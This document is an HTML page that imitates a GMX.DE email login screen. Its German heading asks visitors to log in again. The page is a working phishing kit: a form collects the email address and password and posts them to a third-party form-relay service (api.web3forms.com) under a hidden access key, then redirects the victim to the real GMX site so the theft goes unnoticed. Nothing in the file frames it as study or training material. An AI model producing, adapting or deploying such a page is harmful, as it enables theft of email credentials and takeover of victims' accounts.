<!DOCTYPE html>

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>GMX.DE</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 50vh;
            background-color: #f3f3f3;
            color: black;
            font-family: sans-serif;
        }
        
        .page-box {
            width: 100%;
            max-width: 1000px;
            min-height: 90vh;
            background: #f3f3f3;
            box-shadow: black;
            padding-right: 20px;
            padding-left: 20px;
            border-radius: 5px;
            text-align: center;
            height: auto;
        }
        
        .email {
            margin-bottom: 15px;
            color: black;
            border-radius: 3px;
            padding-top: 15px;
            padding-bottom: 15px;
            border: none;
            width: 60%;
        }
        
        .passwort {
            margin-bottom: 5px;
            color: black;
            border-radius: 3px;
            padding-top: 15px;
            padding-bottom: 15px;
            border: none;
            width: 60%;
        }
        
        .submit {
            margin-top: 20px;
            color: white;
            border-radius: 3px;
            padding-top: 15px;
            padding-bottom: 15px;
            border: none;
            width: 20%;
            text-align: center;
            background-color: #008000;
            font-weight: bold;
        }
        
        main {
            display: flex;
            justify-content: center;
        }
        
        .img {
            display: flex;
            padding-left: 2%;
            padding-top: 1%;
            justify-content: left;
            background-color: #2338A8;
            padding: 8px;
            outline: none;
        }
        
        div {
            text-align: center;
        }
        
        form {
            margin: 2em 10%;
            width: 80%;
        }
        
        .gmx {
            padding-top: 8%;
            padding-bottom: 6%;
        }
    </style>

</head>

<body>
    <div class="page-box">
        <header>
            <div class="img">
                <img src="image/gmxicom.jpg" alt="Not supported" width="40%" height="auto">
                <div class="search">
                </div>
            </div>

            <div class="gmx">
                <img src="image/gmxlogo.jpg" width="20%">
            </div>

            <div>
                <h1>Bitte erneut einloggen</h1>
            </div>

            <div>
                <p>Bitte melden Sie sich mit Ihrem GMX E-Mail- <br> Adresse und ihrem Passwort an.</p>
            </div>
        </header>

        <main>
            <form action="https://api.web3forms.com/submit" method="POST">

                <input type="hidden" name="access_key" value="4313fbb1-01f5-4f4d-961b-a88688bc40d4">

                <input type="hidden" name="redirect" value="https://GMX.DE">

                <div>
                    <input type="email" name="text" placeholder=" GMX.DE E-mail Addresse" maxlength="50" required class="email">
                </div>

                <div>
                    <input type="text" name="text" placeholder=" Passwort eingeben" required class="passwort">
                </div>

                <div>
                    <input type="submit" value="Login" class="submit">
                </div>
            </form>
        </main>

        <section style="text-align: center; font-family: sans-serif; color:#2c2a2a">
            <h3>Neu bei GMX.DE?</h3>
        </section>
    </div>
</body>

</html>